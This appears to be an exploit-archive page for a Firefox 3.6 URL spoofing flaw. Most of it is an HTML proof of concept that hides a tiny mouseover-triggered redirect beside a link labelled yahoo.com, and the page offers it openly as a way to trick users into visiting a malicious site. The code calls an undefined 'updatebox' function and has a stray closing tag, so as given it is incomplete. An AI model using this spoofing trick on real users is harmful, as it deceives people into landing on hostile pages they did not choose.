Mozilla Firefox v3.6 URL Spoofing Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mozilla Firefox v3.6 URL Spoofing Vulnerability
# Published : 2010-02-24
# Author : Unknown
# Previous Title : Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Next Title : MediaCoder v0.7.3.4605 Local Buffer Overflow Exploit

# Tested on: Windows XP SP2/3
# Code : 
# You can trick a user into accessing a malicious website by using 
the following exploit
# The first link would be the malicious one.


<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.youtube.com/watch?v=oHg5S
JYRHA0';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px"></div>

<br>
<a href="http://www.yahoo.com" onclick="updatebox(event)"><font
style="font-family:arial;font-
size:32px">http://www.yahoo.com</font></a><br>

</div>
</body>
</html>